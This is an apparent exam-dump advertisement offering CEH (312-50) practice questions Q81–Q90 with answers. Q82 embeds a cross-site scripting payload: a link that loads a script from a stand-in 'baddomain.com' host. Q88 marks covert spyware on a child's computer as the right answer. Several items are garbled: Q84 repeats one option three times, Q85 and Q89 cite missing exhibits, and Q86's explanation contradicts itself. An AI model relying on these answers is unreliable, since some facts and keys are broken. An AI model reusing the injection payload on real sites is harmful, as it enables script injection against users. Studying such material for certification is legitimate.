★ Pass on Your First TRY ★ 100% Money Back Guarantee ★ Realistic Practice Exam Questions

Free Instant Download NEW 312-50 Exam Dumps (PDF & VCE):
Available on: https://www.certleader.com/312-50-dumps.html


Proper study guides for Refresh EC-Council Ethical Hacking and Countermeasures (CEHv6) certified begins with EC-Council 312-50 preparation products which designed to deliver the 100% Guarantee 312-50 questions by making you pass the 312-50 test at your first time. Try the free 312-50 demo right now.

2021 Sep ceh exam 312-50 pdf:

Q81. MX record priority increases as the number increases.(True/False. 

A. True 

B. False 

Answer: B 

Explanation: The highest priority MX record has the lowest number. 


Q82. This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data. 

<ahref="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js %22%3E%3C/script%3E">See foobar</a> 

What is this attack? 

A. Cross-site-scripting attack 

B. SQL Injection 

C. URL Traversal attack 

D. Buffer Overflow attack 

Answer: A


Q83. The United Kingdom (UK) he passed a law that makes hacking into an unauthorized network a felony. 

The law states: 

Section1 of the Act refers to unauthorized access to computer material. This states that a person commits an offence if he causes a computer to perform any function with intent to secure unauthorized access to any program or data held in any computer. For a successful conviction under this part of the Act, the prosecution must prove that the access secured is unauthorized and that the suspect knew that this was the case. This section is designed to deal with common-or-graden hacking. 

Section 2 of the deals with unauthorized access with intent to commit or facilitate the commission of further offences. An offence is committed under Section 2 if a Section 1 offence has been committed and there is the intention of committing or facilitating a further offense (any offence which attacks a custodial sentence of more than five years, not necessarily one covered but the Act). Even if it is not possible to prove the intent to commit the further offence, the Section 1 offence is still committed. 

Section 3 Offences cover unauthorized modification of computer material, which generally means the creation and distribution of viruses. For conviction to succeed there must have been the intent to cause the modifications and knowledge that the modification had not been authorized 

What is the law called? 

A. Computer Misuse Act 1990 

B. Computer incident Act 2000 

C. Cyber Crime Law Act 2003 

D. Cyber Space Crime Act 1995 

Answer: A 

Explanation: Computer Misuse Act (1990) creates three criminal offences: 


Q84. BankerFox is a Trojan that is designed to steal users' banking data related to certain banking entities. 

When they access any website of the affected banks through the vulnerable Firefox 3.5 browser, the Trojan is activated and logs the information entered by the user. All the information entered in that website will be logged by the Trojan and transmitted to the attacker's machine using covert channel. 

BankerFox does not spread automatically using its own means. It needs an attacking user's intervention in order to reach the affected computer. 


What is the most efficient way an attacker located in remote location to infect this banking Trojan on a victim's machine? 

A. Physical access - the attacker can simply copy a Trojan horse to a victim's hard disk infecting the machine via Firefox add-on extensions 

B. Custom packaging - the attacker can create a custom Trojan horse that mimics the appearance of a program that is unique to that particular computer 

C. Custom packaging - the attacker can create a custom Trojan horse that mimics the appearance of a program that is unique to that particular computer 

D. Custom packaging - the attacker can create a custom Trojan horse that mimics the appearance of a program that is unique to that particular computer 

E. Downloading software from a website? An attacker can offer free software, such as shareware programs and pirated mp3 files 

Answer: E


Q85. What type of session hijacking attack is shown in the exhibit? 


A. Session Sniffing Attack 

B. Cross-site scripting Attack 

C. SQL Injection Attack 

D. Token sniffing Attack 

Answer: A


312-50 testing engine

Renew 312-50 exam cost:

Q86. You are having problems while retrieving results after performing port scanning during internal testing. You verify that there are no security devices between you and the target system. When both stealth and connect scanning do not work, you decide to perform a NULL scan with NMAP. The first few systems scanned shows all ports open. 

Which one of the following statements is probably true? 

A. The systems have all ports open. 

B. The systems are running a host based IDS. 

C. The systems are web servers. 

D. The systems are running Windows. 

Answer: D

Explanation: The null scan turns off all flags, creating a lack of TCP flags that should never occur in the real world. If the port is closed, a RST frame should be returned and a null scan to an open port results in no response. Unfortunately Microsoft (like usual) decided to completely ignore the standard and do things their own way. Thus this scan type will not work against systems running Windows as they choose not to response at all. This is a good way to distinguish that the system being scanned is running Microsoft Windows. 


Q87. The SYN Flood attack sends TCP connections requests faster than a machine can process them. 

Attacker creates a random source address for each packet. SYN flag set in each packet is a request to open a new connection to the server from the spoofed IP Address Victim responds to spoofed IP Address then waits for confirmation that never arrives (timeout wait is about 3 minutes) Victim’s connection table fills up waiting for replies and ignores new connection legitimate users are ignored and will not be able to access the server 

How do you protect your network against SYN Flood attacks? 

A. SYN cookies. Instead of allocating a record, send a SYN-ACK with a carefully constructed sequence number generated as a hash of the clients IP Address port number and other information. When the client responds with a normal ACK, that special sequence number will be included, which the server then verifies. Thus the server first allocates memory on the third packet of the handshake, not the first. 

B. RST cookies – The server sends a wrong SYN|ACK back to the client. The client should then generate a RST packet telling the server that something is wrong. At this point, the server knows the client is valid and will now accept incoming connections from that client normally. 

C. Micro Blocks. Instead of allocating a complete connection, simply allocate a micro-record of 16-bytes for the incoming SYN object. 

D. Stack Tweaking. TCP can be tweaked in order to reduce the effect of SYN floods. Reduce the timeout before a stack frees up the memory allocated for a connection. 

Answer: ABCD

Explanation: All above helps protecting against SYN flood attacks. Most TCP/IP stacks today are already tweaked to make it harder to perform a SYN flood DOS attack against a target. 


Q88. Harold just got home from working at Henderson LLC where he works as an IT technician. He was able to get off early because they were not too busy. When he walks into his home office, he notices his teenage daughter on the computer, apparently chatting with someone online. As soon as she hears Harold enter the room, she closes all her windows and tries to act like she was playing a game. When Harold asks her what she was doing, she acts very nervous and does not give him a straight answer. Harold is very concerned because he does not want his daughter to fall victim to online predators and the sort. Harold doesn't necessarily want to install any programs that will restrict the sites his daughter goes to, because he doesn't want to alert her to his trying to figure out what she is doing. Harold wants to use some kind of program that will track her activities online, and send Harold an email of her activity once a day so he can see what she has been up to. What kind of software could Harold use to accomplish this? 

A. Install hardware Keylogger on her computer 

B. Install screen capturing Spyware on her computer 

C. Enable Remote Desktop on her computer 

D. Install VNC on her computer 

Answer: B


Q89. Exhibit 


(Note: the student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dump.) 

Snort has been used to capture packets on the network. On studying the packets, the penetration tester finds it to be abnormal. If you were the penetration tester, why would you find this abnormal? 

What is odd about this attack? Choose the best answer. 

A. This is not a spoofed packet as the IP stack has increasing numbers for the three flags. 

B. This is back orifice activity as the scan comes form port 31337. 

C. The attacker wants to avoid creating a sub-carries connection that is not normally valid. 

D. These packets were crafted by a tool, they were not created by a standard IP stack. 

Answer: B

Explanation: Port 31337 is normally used by Back Orifice. Note that 31337 is hackers spelling of ‘elite’, meaning ‘elite hackers’. 


Q90. Joe Hacker is going wardriving. He is going to use PrismStumbler and wants it to go to a GPS mapping software application. What is the recommended and well-known GPS mapping package that would interface with PrismStumbler? 

Select the best answer. 

A. GPSDrive 

B. GPSMap 

C. WinPcap 

D. Microsoft Mappoint 

Answer: A

Explanations: 

GPSDrive is a Linux GPS mapping package. It recommended to be used to send PrismStumbler data to so that it can be mapped. GPSMap is a generic term and not a real software package. WinPcap is a packet capture library for Windows. It is used to capture packets and deliver them to other programs for analysis. As it is for Windows, it isn't going to do what Joe Hacker is wanting to do. Microsoft Mappoint is a Windows application. PrismStumbler is a Linux application. Thus, these two are not going to work well together.